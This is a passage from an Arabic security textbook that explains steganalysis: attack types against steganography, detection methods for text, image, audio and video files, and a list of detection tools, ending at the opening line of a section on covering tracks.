‫وﻋﻠﻰ اﻟرﻏم ﻣن ذﻟك‪ ،‬ﻓﺎن اﻟﺑﯾﺎﻧﺎت ﯾﻣﻛن أن ﺗﺻﺑﺢ ﺗﺎﻟﻔﺔ‪ .‬ﺑﻌض اﻟﺧوارزﻣﯾﺎت اﻟﺷﻌﺑﯾﺔ اﻷﺧرى‪ ،‬وھﻣﺎ )‪Windows Bitmap (BMP‬‬
‫و)‪ ،Graphic Interchange Format (GIF‬ﺗﻌﺗﺑر ‪ .Lossless compressions‬اﻟﺻور اﻟﻣﺿﻐوطﺔ ھو ﺗﻣﺛﯾل دﻗﯾﻖ ﻟﻠﺻور اﻷﺻﻠﯾﺔ‪.‬‬

‫‪Steganalysis‬‬
‫‪Steganalysis‬ھﻲ ﻋﻣﻠﯾﺔ ﻋﻛﺳﯾﺔ ﺿد ‪ .steganography‬ﺣﯾث ‪ steganography‬ﯾﺳﺗﺧدم ﻓﻲ إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت‪ ،‬ﺑﯾﻧﻣﺎ ‪Steganalysis‬‬
‫ﯾﺳﺗﺧدم ﻟﻠﻛﺷف ﻋن اﻟﺑﯾﺎﻧﺎت اﻟﻣﺧﻔﯾﺔ‪ .‬ﻓﺈﻧﮫ ﯾﺣدد اﻟرﺳﺎﻟﺔ اﻟﺧﻔﯾﺔ اﻟﻣﺷﻔرة‪ ،‬وإذا ﻛﺎن ذﻟك ﻣﻣﻛﻧﺎ‪ ،‬ﻓﺈﻧﮫ ﯾﺳﺗرد ﺗﻠك اﻟرﺳﺎﻟﺔ‪ .‬وﯾﻣﻛن اﻟﻛﺷف ﻋن‬
‫اﻟرﺳﺎﻟﺔ ﻣن ﺧﻼل اﻟﻧظر ﻓﻲ اﻟﻔروق ﺑﯾن أﻧﻣﺎط اﻟﺑت وأﺣﺟﺎم اﻟﻣﻠﻔﺎت اﻟﻛﺑﯾرة ﺑﺷﻛل ﻏﯾر ﻋﺎدي‪.‬‬

‫اﻟﺧطوة اﻷوﻟﻰ ﻓﻲ ‪ Steganalysis‬ھو اﻛﺗﺷﺎف اﻟﺻورة اﻟﺗﻲ ﯾﺷﺗﺑﮫ ﻓﯾﮭﺎ ﺑﺈﯾواء رﺳﺎﻟﺔ‪ .‬وﯾﻌﺗﺑر أن ھذا ھﺟوم ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧﻔﯾﺔ‪ .‬ھﻧﺎك‬
‫ﻧوﻋﺎن ﻣن أﻧواع اﻟﮭﺟﻣﺎت اﻷﺧرى ﺿد إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‪ message attacks :‬و‪.chosen-message attacks‬‬
‫‪ Steganalyst‬ﯾﻌرف ﺑوﺟود اﻟرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ ﻓﻲ ﻣﻠف‪ stego-image‬اﻟﻣﻘﺎﺑل‪ .‬ﯾﺣدد ‪ steganalyst‬اﻷﻧﻣﺎط اﻟﺗﻲ ﺗﻧﺷﺄ ﻣن إﺧﻔﺎء اﻟرﺳﺎﻟﺔ‬
‫وﻛﺷف ھذه اﻟرﺳﺎﻟﺔ‪ Steganalyst .‬ﯾﻘوم ﺑﺈﻧﺷﺎء رﺳﺎﻟﺔ ﺑﺎﺳﺗﺧدام أداة ‪ stego‬ﯾﻌرف وﯾﺣﻠل اﻻﺧﺗﻼﻓﺎت ﻓﻲ اﻷﻧﻣﺎط‪.‬‬

‫ﺻور اﻟﻐطﺎء ﺗﻛﺷف ﻋن اﻟﻣزﯾد ﻣن اﻟﻘراﺋن اﻟﺑﺻرﯾﺔ ﺑﺎﻟﻣﻘﺎرﻧﺔ ﻣﻊ ‪ .stego-image‬ﻓﻣن اﻟﺿروري ﺗﺣﻠﯾل ‪ stego-image‬ﻟﺗﺣدﯾد‬
‫اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﯾﺗم إﺧﻔﺎؤھﺎ‪ .‬اﻟﻔﺟوة ﺑﯾن ﺻورة اﻟﻐطﺎء وﺣﺟم اﻟﻣﻠف ‪ stego-image‬ﻣن اﻟﺳﮭل ﺗوﻗﻌﮫ‪ .‬اﻟﻌدﯾد ﻣن اﻟﺗوﻗﯾﻌﺎت ﺗﻛون واﺿﺣﺔ‬
‫ﺑﺎﺳﺗﺧدام اﻟﻌدﯾد ﻣن اﺳﻛﯾﻣﺎت اﻷﻟوان ﻣن ﺻورة اﻟﻐطﺎء‪.‬‬
‫ﺑﻣﺟرد اﻛﺗﺷﺎﻓﮭﺎ‪ Stego-image ،‬ﯾﻣﻛن ﺗدﻣﯾرھﺎ أو ﺗﻌدﯾل اﻟرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ‪ .‬ﺑﻌض اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗم اﺧﻔﺎﺋﮭﺎ ﺑداﺧل اﻟﺻورة ﺑﺎﺳﺗﺧدام‬
‫‪ Image Domain Tool‬ﯾﻣﻛن أن ﺗﻛون ﻋدﯾم اﻟﻔﺎﺋدة‪.‬‬

‫ﺗﺣدﯾﺎت‪: Steganalysis‬‬
‫‪ -‬ﺗﯾﺎر اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺷﺗﺑﮫ ﻓﯾﮫ ﻗد أو ﻗد ﻻ ﯾﻣﻠك ﺗرﻣﯾز اﻟﺑﯾﺎﻧﺎت اﻟﻣﺧﻔﯾﺔ‬
‫‪Suspect information stream may or may not have encoded hidden data‬‬
‫‪ -‬اﻟﻛﺷف ﻋن ﻛﻔﺎءة ودﻗﺔ اﻟﻣﺣﺗوﯾﺎت اﻟﻣﺧﺑﺄة داﺧل اﻟﺻور اﻟرﻗﻣﯾﺔ‪.‬‬
‫‪Efficient and accurate detection of hidden content within digital images‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪478‬‬

‫ﺗﺷﻔﯾر اﻟﺑﯾﺎﻧﺎت اﻟﻣﺧﻔﯾﺔ ﻗﺑل ﺗﺿﻣﯾﻧﮫ داﺧل اﻟﻣﻠف أو إﺷﺎرة‬ ‫‪-‬‬


‫‪Encrypts the hidden data before inserted into a file or signal‬‬
‫ﺑﻌض اﻹﺷﺎرات اﻟﻣﺷﺗﺑﮫ ﻓﯾﮫ أو اﻟﻣﻠﻔﺎت ﻗد ﺗﺣﺗوي ﻋﻠﻰ ﺑﯾﺎﻧﺎت ذات ﺻﻠﮫ أو ﺿوﺿﺎء ﺑداﺧﻠﮭﺎ‪.‬‬ ‫‪-‬‬

‫‪Steganalysis Methods/Attacks on Steganography‬‬

‫ﯾﺗم ﺗﻘﺳﯾم اﻟﮭﺟﻣﺎت ﺿد ‪ Steganography‬إﻟﻰ ﺛﻣﺎﻧﯾﺔ أﻧواع ﻛﺎﻻﺗﻰ‪:‬‬


‫‪Stego-only attacks reformat attacks, known-cover attacks, known-message attacks, known-stego‬‬
‫‪attacks, chosen-stego attacks, chosen-message attacks, and disabling attacks.‬‬
‫‪Stego-only attack‬‬
‫ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﯾﺣدث ﻋﻧدﻣﺎ ﻻ ﯾوﺟد ﺳوى ‪ ،stego-medium‬واﻟﺗﻲ ﺗﻧﻔذ اﻟﮭﺟوم‪ .‬اﻟطرﯾﻘﺔ اﻟوﺣﯾدة ﻟﺗﺟﻧب ھذا اﻟﮭﺟوم ھو ﻋن طرﯾﻖ‬
‫اﻟﻛﺷف واﺳﺗﺧراج اﻟرﺳﺎﻟﺔ اﻟﻣﺿﻣﻧﺔ‪.‬‬
‫‪Reformat attack‬‬
‫ﻓﻲ ھذه اﻟطرﯾﻘﺔ ﯾﺗم ﺗﻐﯾﯾر ﺗﻧﺳﯾﻖ اﻟﻣﻠف‪ .‬ﺣﯾث ان ﺗﻧﺳﯾﻘﺎت اﻟﻣﻠﻔﺎت اﻟﻣﺧﺗﻠﻔﺔ ﺗﻘوم ﺑﺗﺧزﯾن اﻟﺑﯾﺎﻧﺎت ﺑطرق ﻣﺧﺗﻠﻔﺔ‪.‬‬
‫‪Known-cover attack‬‬
‫ﯾﺗم اﺳﺗﺧدام ھذا اﻟﮭﺟوم ﻣﻊ وﺟود ‪ stego-medium‬ﻓﺿﻼ ﻋن ‪ .cover-medium‬وھذا ﻣن ﺷﺄﻧﮫ ﺗﻣﻛﯾن اﻟﻣﻘﺎرﻧﺔ ﺑﯾن اﻟوﺳﺎﺋط ﺑﺣﯾث‬
‫ﯾﻣﻛن اﻟﻛﺷف ﻋن اﻟﺗﻐﯾﯾر ﻓﻲ ﺻﯾﻎ اﻟوﺳﺎﺋط‪.‬‬
‫‪Known-message attack‬‬
‫ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﯾﻔﺗرض وﺟود ﻛﻼ ﻣن اﻟرﺳﺎﻟﺔ و‪ .stego-medium‬ﺑواﺳطﺔ ھذه اﻟﺗﻘﻧﯾﺔ ﯾﻣﻛن إﯾﺟﺎد اﻟرﺳﺎﻟﺔ اﻟﻣﺿﻣﻧﺔ‪.‬‬
‫‪Known-Stego attack‬‬
‫ﻓﻲ ھذا اﻟﮭﺟوم‪ ،‬ﯾﺗم ﺗﻌرﯾف اﻟﺧوارزﻣﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت واﻟﻣﻠف اﻷﺻﻠﻲ و‪ Stego-object‬ﻛﻼھﻣﺎ ﻣﺗﺎح‪.‬‬
‫‪Chosen-stego attack‬‬
‫ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﯾﺣدث ﻋﻧدﻣﺎ ﯾوﻟد ‪ forensic investigator‬ال ‪ stego-medium‬ﻣن اﻟرﺳﺎﻟﺔ ﺑﺎﺳﺗﺧدام أداة ﺧﺎﺻﺔ‪ .‬اﻟﺑﺣث ﻋن‬
‫اﻟﺗوﻗﯾﻌﺎت ﯾﻣﻛن اﻟﻛﺷف ﻋن ‪ steganography mediums‬اﻷﺧرى واﻟﺗﻲ ﯾﻣﻛن ﺣﻣل ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم‪.‬‬
‫‪Chosen-message attack‬‬
‫‪ Steganalyst‬ﯾوﻟد ‪ stego-object‬ﻣن ﺑﻌض أدوات ‪steganography‬أو ﺧوارزﻣﯾﺔ ‪steganography‬ﻟﻠرﺳﺎﻟﺔ اﻟﻣﺧﺗﺎرة‪ .‬اﻟﮭدف ﻣن ھذا‬
‫اﻟﮭﺟوم ھو ﺗﺣدﯾد أﻧﻣﺎط ﻓﻲ ‪ stego-object‬واﻟﺗﻲ ﻗد ﺗﺷﯾر إﻟﻰ اﺳﺗﺧدام أدوات ‪steganography‬ﻣﻌﯾﻧﺔ أو ﺧوارزﻣﯾﺎت ‪.steganography‬‬
‫‪Disabling or active attacks‬‬
‫ﯾﺻﻧف ھذه إﻟﻰ ﺳﺗﺔ أﺟزاء‪ ،‬واﻟﺗﻲ ﺗﺷﻣل اﻟطﻣس)‪ ، (blur‬ﺗﻘﻠﯾل اﻟﺿوﺿﺎء)‪ ،rotate ،sharpen ، (noise reduction‬إﻋﺎدة ﺗﺷﻛﯾﻠﮫ‬
‫)‪ ،(resample‬و‪ Disabling attacks .soften‬ﯾﻣﻛﻧﮫ ﺗﺳﮭﯾل اﻟﺗﺣوﻻت و ﺗﻘﻠﯾل اﻟﺗﺑﺎﯾن ﻋن طرﯾﻖ ﺣﺳﺎب ﻣﺗوﺳط ﺑﻛﺳل اﻟﻣوﺟود ﺑﺟﺎﻧب‬
‫اﻟﺣواف اﻟﺛﺎﺑت ﻟﻠﺧطوط اﻟﻣﺣددة و اﻟﻣﻧﺎطﻖ اﻟﺗﻲ ﺗوﺟد ﻓﯾﮭﺎ ﺗﺣوﻻت اﻟﻠون ﻛﺑﯾرة‪ .‬وھذا ﻣﺎ ﯾﺳﻣﻰ ‪ blurring‬ﻠ ‪ .stego-medium‬اﻟﺿﺟﯾﺞ‬
‫اﻟﻌﺷواﺋﻲ )‪ (random noise‬ﻓﻲ‪ stego-medium‬ﯾﻣﻛﻧﮫ إدراج ﺑﻛﺳل ﻟون ﻋﺷواﺋﻲ إﻟﻰ اﻟﺻورة‪ .‬اﻟﺿوﺿﺎء اﻟﻣوﺣدة )‪(uniform noise‬‬
‫ﯾﻣﻛﻧﮫ إدراج اﻟﺑﻛﺳل واﻷﻟوان اﻟﺗﻲ ﺗﺷﺑﮫ اﻟﺑﻛﺳل اﻷﺻﻠﻲ‪ .‬اﻟﺣد ﻣن اﻟﺿوﺿﺎء )‪ (noise reduction‬ﯾﻘﻠل ﻣن اﻟﺿوﺿﺎء ﻓﻲ اﻟﺻورة ﻣن‬
‫ﺧﻼل ﺗﻌدﯾل اﻷﻟوان وﺑﻠوغ ﻣﺗوﺳط ﻗﯾم ﺑﻛﺳل‪ Sharpening .‬ھو اﻟﺗﺄﺛﯾر اﻟﻣﻌﺎﻛس ﻠ ‪ .blur‬ﻷﻧﮫ ﯾزﯾد اﻟﺗﺑﺎﯾن ﺑﯾن اﻟﺑﻛﺳﻼت اﻟﻣﺟﺎورة ﺣﯾث‬
‫ﯾوﺟد ﺗﺑﺎﯾن اﻻﻟوان اﻟﮭﺎﻣﺔ اﻟﺗﻲ ﻋﺎدة ﻣﺎ ﺗﻛون ﻋﻠﻰ ﺣﺎﻓﺔ اﻟﻛﺎﺋﻧﺎت‪ Rotation .‬ﯾﻘوم ﺑﺗﺣرﯾك ‪ stego-medium‬ﻟﯾﻌطﻲ ﻧﻘطﮫ وﺳطﮭﺎ‪.‬‬
‫‪ Resample‬ﯾﺷﻣل ﻣﺎ ﯾﻌرف ﺑﺎﺳم ﻋﻣﻠﯾﺔ اﻻﺳﺗﯾﻔﺎء )‪ (interpolation process‬اﻟﺗﻲ ﺗﺳﺗﺧدم ﻟﻠﺣد ﻣن ‪ raggedness‬اﻟﻣرﺗﺑطﺔ ﺒ‬
‫‪ .stego-medium‬ﯾﺳﺗﺧدم ﻋﺎدة ‪ Resample‬ﻟﺗﻐﯾﯾر ﺣﺟم اﻟﺻورة‪ Softening of the stego-medium .‬ﯾطﺑﻖ ‪uniform blur‬‬
‫إﻟﻰ اﻟﺻورة ﻟﺗﺟﺎﻧس اﻟﺣواف واﻟﺣد ﻣن اﻟﺗﺑﺎﯾن )‪ (Contrast‬وﺗﺳﺑب ﺗﺷوﯾﮫ أﻗل ﻣن ‪.blurring‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪479‬‬

‫‪Detecting Text and Image Steganography‬‬


‫‪ Steganography‬ھو ﻓن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ أو اﻟﺣﺳﺎﺳﺔ داﺧل ﻏطﺎء)‪ . (cover medium‬ﻓﻲ ھذا‪ ،‬ﺗﺳﺗﺧدم اﻟﺑﺗﺎت ﻏﯾر ﻣﺳﺗﺧدﻣﺔ‬
‫ﻟﻠﺑﯾﺎﻧﺎت ﻓﻲ ﻣﻠﻔﺎت اﻟﻛﻣﺑﯾوﺗر ﻣﺛل اﻟرﺳوﻣﺎت واﻟﺻور اﻟرﻗﻣﯾﺔ‪ ،‬واﻟﻧص‪ ،HTML ،‬اﻟﺦ‪ .‬ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ ﻣن اﻟﻣﺳﺗﺧدﻣﯾن ﻏﯾر‬
‫اﻟﻣﺻرح ﺑﮫ‪ .‬اﻟﻛﺷف ﻋن اﻟﺑﯾﺎﻧﺎت اﻟﻣﺧﻔﯾﺔ ﺗﺗم ﺑطرق ﻣﺧﺗﻠﻔﺔ اﻋﺗﻣﺎدا ﻋﻠﻰ اﻟﻣﻠﻔﺎت اﻟﻣﺳﺗﺧدﻣﺔ‪ .‬أﻧواع اﻟﻣﻠﻔﺎت اﻟﺗﺎﻟﯾﺔ ﺗﺗطﻠب أﺳﺎﻟﯾب ﻣﺣددة‬
‫ﻟﻠﻛﺷف ﻋن اﻟرﺳﺎﺋل اﻟﻣﺧﻔﯾﺔ‪ .‬ﻋﻧدﻣﺎ ﯾﺗم إﺧﻔﺎء اﻟرﺳﺎﻟﺔ ﻓﻲ ﻣﻠف ﺑﻣﺛل ھذه اﻟطرﯾﻘﺔ اﻟﺗﻲ ﻻ ﯾﻣﻛن أن ﯾﻛون ﻋﻠﻰ ﺑﯾﻧﮫ ﺑوﺟد ھذه اﻟرﺳﺎﻟﺔ إﻻ‬
‫اﻟﻣﺳﺗﺧدﻣﯾن اﻟذي ﯾﻣﻠﻛون ﺗﺻرﯾﺢ ﺑذﻟك ﺣﯾث ﯾﻣﻛﻧﮭم ﻗراءة اﻟرﺳﺎﻟﺔ ﺧﻔﯾﺔ أو اﺳﺗرداد اﻟرﺳﺎﻟﺔ‪ ،‬ورﺑﻣﺎ ﯾﺗم ﺗطﺑﯾﻖ ﺗﻐﯾﯾر ﻋﻠﻰ اﻟﻐطﺎء أو اﻟﻣﻠف‬
‫اﻟﻧﺎﻗل‪ .‬اﻟﺗﻐﯾﯾر ﯾﺧﺗﻠف ﺑﻧﺎء ﻋﻠﻰ ﻧوع اﻟﻣﻠﻔﺎت اﻟﻣﺳﺗﺧدﻣﺔ واﻟﻧﺎﻗل‪.‬‬
‫‪Text Files‬‬
‫ﻓﻲ اﻟﻣﻠﻔﺎت اﻟﻧﺻﯾﺔ‪ ،‬ﯾﺗم إﺟراء ﺗﻌدﯾﻼت ﻋﻠﻰ ﻣوﺿﻊ اﻟﺣرف ﻹﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت‪ .‬وﯾﻣﻛن اﻟﻛﺷف ﻋن ھذه اﻟﺗﻌدﯾﻼت ﻣن ﺧﻼل اﻟﺑﺣث ﻋن أﻧﻣﺎط‬
‫اﻟﻧص أو أي ﻣن اﻻﺿطراﺑﺎت‪ ،‬واﻟﻠﻐﺔ اﻟﻣﺳﺗﺧدﻣﺔ‪ ،‬ارﺗﻔﺎع اﻟﺧط‪ ،‬واﻟﻌدد اﻟﻐﯾر ﻋﺎدي ﻣن اﻟﻣﺳﺎﻓﺎت اﻟﻔﺎرﻏﺔ‪.‬‬
‫‪Image Files‬‬
‫ﯾﻣﻛن اﻟﻛﺷف ﻋن اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗم إﺧﻔﺎﺋﮭﺎ ﻓﻲ اﻟﺻورة ﻋن طرﯾﻖ ﺗﺣدﯾد اﻟﺗﻐﯾﯾرات ﺳواء ﻓﻲ اﻟﺣﺟم وﺷﻛل ﻣﻠف‪ ،‬آﺧر ﺗﻌدﯾل‪ ،‬آﺧر ﺗﻌدﯾل‬
‫ﻟﻠطﺎﺑﻊ اﻟزﻣﻧﻲ‪ ،‬واﻟواح اﻷﻟوان ﻣن اﻟﻣﻠف‪.‬‬
‫أﺳﺎﻟﯾب اﻟﺗﺣﻠﯾل اﻹﺣﺻﺎﺋﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻋﻧد ﻓﺣص اﻟﺻورة‪ .‬ﻋﻠﻰ اﻓﺗراض أن اﻟﺷﻲء اﻷﻗل أھﻣﯾﺔ ھو أﻛﺛر أو أﻗل ﻋﺷواﺋﯾﺔ ھو اﻓﺗراض‬
‫ﻏﯾر ﺻﺣﯾﺢ ﻣﻧذ ﺗطﺑﯾﻖ اﻟﻔﻠﺗرة واﻟﺗﻲ ﯾﻣﻛﻧﮭﺎ ان ﺗظﮭران ‪ LSBs‬ﯾﻣﻛﻧﮫ إﻧﺗﺎج ﺻورة ﻣﻌﺗرف ﺑﮭﺎ‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺈﻧﮫ ﯾﻣﻛن اﺳﺗﻧﺗﺎج أن ‪LSBs‬‬
‫ﻟﯾﺳت ﻋﺷواﺋﯾﺔ‪ .‬ﺑدﻻ ﻣن ذﻟك‪ ،‬أﻧﮭﺎ ﺗﺗﻛون ﻣن اﻟﻣﻌﻠوﻣﺎت ﺣول اﻟﺻورة ﺑﺄﻛﻣﻠﮭﺎ‪.‬‬
‫ﻛﻠﻣﺎ ﺗم إدراج رﺳﺎﻟﺔ ﺳرﯾﺔ إﻟﻰ ﺻورة‪ ،‬ﻟم ﯾﻌد ‪ LSBs‬ﺑﺷﻛل ﻋﺷواﺋﻲ‪ .‬ﻣﻊ اﻟﺑﯾﺎﻧﺎت اﻟﻣﺷﻔرة اﻟﺗﻲ ﻟدﯾﮭﺎ ‪ entropy‬ﻋﺎﻟﯾﺔ‪ ،‬ﻓﺈن ‪ LSB‬اﻟﺧﺎص‬
‫ﺑﺎﻟﻐطﺎء ﻻ ﯾﺣﺗوي ﻋﻠﻰ ﻣﻌﻠوﻣﺎت ﻋن اﻷﺻل‪ ،‬وھو أﻛﺛر أو أﻗل ﻋﺷواﺋﯾﺔ‪ .‬ﺑﺎﺳﺗﺧدام اﻟﺗﺣﻠﯾل اﻹﺣﺻﺎﺋﻲ ﻋﻠﻰ ‪ ،LSB‬ﻓﺎن اﻟﻔرق ﺑﯾن اﻟﻘﯾم‬
‫اﻟﻌﺷواﺋﯾﺔ واﻟﻘﯾم اﻟﺣﻘﯾﻘﯾﺔ ﯾﻣﻛن ﺗﺣدﯾدھﺎ‪.‬‬

‫‪Detecting Audio and Video Steganography‬‬


‫‪Audio File‬‬

‫ﻓﻲ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺳﻣﻌﯾﺔ‪ ،‬اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻣﺛل اﻟوﺛﺎﺋﻖ واﻟﻣﻠﻔﺎت اﻟﺧﺎﺻﺔ ﯾﺗم ﺗﺿﻣﯾﻧﮭﺎ ﻓﻲ ﻣﻠف اﻟﺻوت اﻟرﻗﻣﻲ‪ .‬ﯾﻣﻛن اﻟﻛﺷف ﻋن ھذه‬
‫اﻟوﺛﺎﺋﻖ اﻟﺗﻲ ﺗم إﺧﻔﺎﺋﮭﺎ ﺑﺎﺳﺗﺧدام اﻟطرق اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪ -‬طرﯾﻘﺔ اﻟﺗﺣﻠﯾل اﻹﺣﺻﺎﺋﻲ ﯾﻣﻛﻧﮭﺎ أﯾﺿﺎ أن ﺗﺳﺗﺧدم ﻟﻣﻠﻔﺎت اﻟﺻوت ﺣﯾث ﯾﺗم اﺳﺗﺧدام ﺗﻌدﯾﻼت ‪ LSB‬أﯾﺿﺎ ﻋﻠﻰ ﻣﻠف اﻟﺻوت‪.‬‬
‫‪ -‬اﻟﺗرددات ﻏﯾر ﻣﺳﻣوﻋﺔ ﯾﻣﻛن ﻓﺣﺻﮭﺎ ﻟﻠﺣﺻول ﻋﻠﻰ ﻣﻌﻠوﻣﺎت‪.‬‬
‫‪ -‬اﻟﺗﺷوھﺎت اﻟﻔردﯾﺔ واﻷﻧﻣﺎط ﺗظﮭر وﺟود ﺑﯾﺎﻧﺎت ﺳرﯾﺔ‪.‬‬
‫‪Video File -‬‬

‫ﻓﻲ إﺧﻔﺎء ﻣﻌﻠوﻣﺎت اﻟﻔﯾدﯾو‪ ،‬اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ أو أي ﻧوع ﻣن اﻟﻣﻠﻔﺎت ذات أي ﻧوع ﻣن اﻻﻣﺗدادات ﯾﺗم إﺧﻔﺎﺋﮫ ﻓﻲ ﻣﻠف اﻟﻔﯾدﯾو اﻟﻧﺎﻗل إﻣﺎ‬
‫ﺑﺎﺳﺗﺧدام أدوات ‪ audio steganography‬أو ‪ .image steganography‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺈن اﻟﻛﺷف ﻋن اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ ﻓﻲ ﻣﻠﻔﺎت اﻟﻔﯾدﯾو‬
‫ﯾﺗﺿﻣن ﻣﺟﻣوﻋﺔ ﻣن اﻷﺳﺎﻟﯾب اﻟﻣﺳﺗﺧدﻣﺔ ﻓﻲ اﻟﺻورة واﻟﻣﻠﻔﺎت اﻟﺻوﺗﯾﺔ‪ .‬ﯾوﺟد اﻛواد ﺧﺎﺻﮫ وإﯾﻣﺎءات ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻠﻛﺷف ﻋن اﻟﺑﯾﺎﻧﺎت‬
‫اﻟﺳرﯾﺔ‪.‬‬

‫‪Steganography Detection Tool: Gargoyle Investigator Forensic Pro‬‬


‫اﻟﻣﺻدر‪http://www.wetstonetech.com :‬‬
‫‪ Gargoyle Investigator Forensic Pro‬ھﻲ أداة ﺗﺟري ﻋﻣﻠﯾﺎت ﺑﺣث ﺳرﯾﻌﺔ ﻋﻠﻰ ﺟﮭﺎز ﻛﻣﺑﯾوﺗر ﻣﻌﯾن أو آﻻت ﻟﻠﺑﺣث ﻋن اﻟﺑراﻣﺞ‬
‫اﻟﺧﺑﯾﺛﺔ اﻟﻣﻌروﻓﺔ واﻟﻣﻣﻧوﻋﺎت‪ .‬ﻣن اﻟﻣﻣﻛن اﻟﻌﺛور ﻋﻠﻰ ﺑﻘﺎﯾﺎ ﺣﺗﻰ وﻟو ﺗﻣت إزاﻟﺔ اﻟﺑرﻧﺎﻣﺞ ﺣﯾث ان ﻋﻣﻠﯾﺔ اﻟﺑﺣث ﺗﺗم ﻋﻠﻰ اﻟﻣﻠﻔﺎت اﻟﻔردﯾﺔ‬
‫اﻟﻣرﺗﺑطﺔ ﺑﺑرﻧﺎﻣﺞ ﻣﻌﯾن‪ .‬ﯾﻣﻠك ﻣﺟﻣوﻋﺔ ﺗواﻗﯾﻊ )‪ (signature set‬ﺗﺣﺗوي ﻋﻠﻰ أﻛﺛر ﻣن ‪ 20‬ﻓﺋﺔ‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك ‪،Trojans ،botnets‬‬
‫‪ Keyloggers ،encryption ،steganography‬وﻏﯾرھﺎ‪ ،‬وﯾﺳﺎﻋد ﻓﻲ اﻟﻛﺷف ﻋن ﻣﻠﻔﺎت ‪ Stego‬اﻟﺗﻲ ﺗم إﻧﺷﺎؤھﺎ ﺑﺎﺳﺗﺧدام‬
‫‪ ،S-Tools ،Weavwav ،Blindside‬وﻣﺎ إﻟﻰ ذﻟك‪ .‬ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ إﺟراء ﻓﺣص ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﻗﺎﺋم ﺑذاﺗﮫ أو ﻣوارد ﺷﺑﻛﺔ ﻣن اﺟل‬
‫اﻟﺑراﻣﺞ اﻟﺧﺑﯾﺛﺔ اﻟﻣﻌروﻓﺔ‪ ،‬وﻗدرة اﻟﻔﺣص داﺧل ﻣﻠﻔﺎت اﻷرﺷﯾف‪ ،‬اﻟﺦ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪480‬‬

‫‪Steganography Detection Tools‬‬


‫أدوات اﻟﻛﺷف ﻋن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺗﺳﻣﺢ ﻟك ﺑﺎﻟﻛﺷف واﺳﺗﻌﺎدة اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧﻔﯾﺔ ﻓﻲ أي وﺳﺎﺋل اﻹﻋﻼم اﻟرﻗﻣﯾﺔ ﻣﺛل اﻟﺻور واﻟﺻوت‬
‫واﻟﻔﯾدﯾو‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﻗﺎﺋﻣﺔ ﺑﺄدوات اﻟﻛﺷف ﻋن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‪:‬‬
‫‪Xstegsecret available at http://stegsecret.sourceforge.net‬‬
‫‪Stego Suite available at http://www.wetstonetech.com‬‬
‫‪StegAlyzerAS available at http://www.sarc-wv.com‬‬
‫‪StegAlyzerRTS available at http://www.sarc-wv.com‬‬
‫‪StegSpy available at http://www.spy-hunter.com‬‬
‫‪StegAlyzerSS available at http://www.sarc-wv.com‬‬
‫‪StegMark SDK available at http://www.datamark.com.sg‬‬
‫‪Steganography Studio available at http://sourceforge.net‬‬
‫‪Steganographic Laboratory (VSL) available at http://vsl.sourceforge.net‬‬
‫‪Stegdetect available at http://www.outguess.org‬‬

‫‪COVERING TRACKS 5.7‬‬

‫ﺑﻣﺟرد ﻛﺳر اﻟﻣﮭﺎﺟم اﻟﺷﺑﻛﺔ اﻟﻣﺳﺗﮭدﻓﺔ أو اﻟﻛﻣﺑﯾوﺗر ﺑﻧﺟﺎح‪ ،‬ﻓﺎﻧﮫ ﯾﺣﺎول إﺧﻔﺎء ﻧﻔﺳﮫ ﻣن أن ﯾﺗم اﻛﺗﺷﺎﻓﮫ أو ﺗﺗﺑﻌﮫ‪ .‬ﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﯾﺣﺎول اﻟﻣﮭﺎﺟم‬
